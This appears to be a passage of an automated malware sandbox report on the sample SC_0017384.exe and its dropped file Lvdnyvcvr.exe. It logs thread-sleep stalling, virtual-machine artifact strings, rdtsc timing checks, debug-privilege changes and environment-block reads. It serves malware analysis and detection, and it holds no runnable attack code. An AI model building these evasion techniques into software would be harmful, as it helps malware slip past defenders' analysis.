          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5980Thread sleep count: 2343 > 30Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99812s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99700s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99593s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99484s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99372s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99265s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99151s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -99042s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5996Thread sleep time: -98916s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exe TID: 5884Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1380Thread sleep time: -9223372036854770s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -5534023222112862s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -100000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 3856Thread sleep count: 2522 > 30Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99848s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99714s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99609s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99499s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99385s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99274s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99172s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -99057s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -98953s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 1324Thread sleep time: -98844s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 2248Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\systray.exe TID: 5724Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -100000s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5740Thread sleep count: 2179 > 30
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99844s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99661s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99545s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99436s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99297s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99184s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -99075s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5732Thread sleep time: -98968s >= -30000s
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe TID: 5716Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4088Thread sleep time: -14757395258967632s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1004Thread sleep count: 9436 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1792Thread sleep time: -15679732462653109s >= -30000s
          Source: C:\Windows\SysWOW64\systray.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01835BA5 rdtsc 3_2_01835BA5
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\SC_0017384.exeWindow / User API: threadDelayed 2343Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9412Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 736Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 703Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeWindow / User API: threadDelayed 2522Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeWindow / User API: threadDelayed 2179
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9589
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9436
          Source: C:\Users\user\Desktop\SC_0017384.exeAPI coverage: 9.4 %
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 100000Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99812Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99700Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99593Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99484Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99372Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99265Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99151Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 99042Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 98916Jump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 100000Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99848Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99714Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99609Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99499Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99385Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99274Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99172Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99057Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 98953Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 98844Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 100000
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99844
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99661
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99545
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99436
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99297
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99184
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 99075
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 98968
          Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001412000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
          Source: explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: Lvdnyvcvr.exe, 00000005.00000002.567915888.0000000005DED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000002.582466322.0000000004437000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: Lvdnyvcvr.exe, 00000009.00000002.574184145.0000000005E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
          Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000004.00000003.533892507.000000000EFC5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551309826.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.539351486.000000000EFC7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551825356.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.593029452.000000000EFCB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01835BA5 rdtsc 3_2_01835BA5
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h]3_2_0176B171
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h]3_2_0176B171
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176C962 mov eax, dword ptr fs:[00000030h]3_2_0176C962
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h]3_2_0178B944
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h]3_2_0178B944
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179513A mov eax, dword ptr fs:[00000030h]3_2_0179513A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179513A mov eax, dword ptr fs:[00000030h]3_2_0179513A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov eax, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01784120 mov ecx, dword ptr fs:[00000030h]3_2_01784120
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]3_2_01769100
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]3_2_01769100
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769100 mov eax, dword ptr fs:[00000030h]3_2_01769100
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]3_2_0176B1E1
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]3_2_0176B1E1
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h]3_2_0176B1E1
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017F41E8 mov eax, dword ptr fs:[00000030h]3_2_017F41E8
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]3_2_017E51BE
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]3_2_017E51BE
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]3_2_017E51BE
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h]3_2_017E51BE
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E69A6 mov eax, dword ptr fs:[00000030h]3_2_017E69A6
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h]3_2_017961A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h]3_2_017961A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01792990 mov eax, dword ptr fs:[00000030h]3_2_01792990
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178C182 mov eax, dword ptr fs:[00000030h]3_2_0178C182
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179A185 mov eax, dword ptr fs:[00000030h]3_2_0179A185
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01780050 mov eax, dword ptr fs:[00000030h]3_2_01780050
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01780050 mov eax, dword ptr fs:[00000030h]3_2_01780050
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179002D mov eax, dword ptr fs:[00000030h]3_2_0179002D
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]3_2_0177B02A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]3_2_0177B02A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]3_2_0177B02A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h]3_2_0177B02A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]3_2_017E7016
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]3_2_017E7016
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h]3_2_017E7016
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01834015 mov eax, dword ptr fs:[00000030h]3_2_01834015
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01834015 mov eax, dword ptr fs:[00000030h]3_2_01834015
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017658EC mov eax, dword ptr fs:[00000030h]3_2_017658EC
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov ecx, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h]3_2_017FB8D0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179F0BF mov ecx, dword ptr fs:[00000030h]3_2_0179F0BF
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h]3_2_0179F0BF
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h]3_2_0179F0BF
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017A90AF mov eax, dword ptr fs:[00000030h]3_2_017A90AF
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h]3_2_017920A0
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01822073 mov eax, dword ptr fs:[00000030h]3_2_01822073
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01769080 mov eax, dword ptr fs:[00000030h]3_2_01769080
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01831074 mov eax, dword ptr fs:[00000030h]3_2_01831074
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h]3_2_017E3884
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h]3_2_017E3884
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0181D380 mov ecx, dword ptr fs:[00000030h]3_2_0181D380
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h]3_2_01793B7A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h]3_2_01793B7A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182138A mov eax, dword ptr fs:[00000030h]3_2_0182138A
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176DB60 mov ecx, dword ptr fs:[00000030h]3_2_0176DB60
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_01835BA5 mov eax, dword ptr fs:[00000030h]3_2_01835BA5
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176F358 mov eax, dword ptr fs:[00000030h]3_2_0176F358
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0176DB40 mov eax, dword ptr fs:[00000030h]3_2_0176DB40
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0178DBE9 mov eax, dword ptr fs:[00000030h]3_2_0178DBE9
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_0182131B mov eax, dword ptr fs:[00000030h]3_2_0182131B
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h]3_2_017903E2
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h]3_2_017E53CA
          Source: C:\Users\user\Desktop\SC_0017384.exeCode function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h]3_2_017E53CA
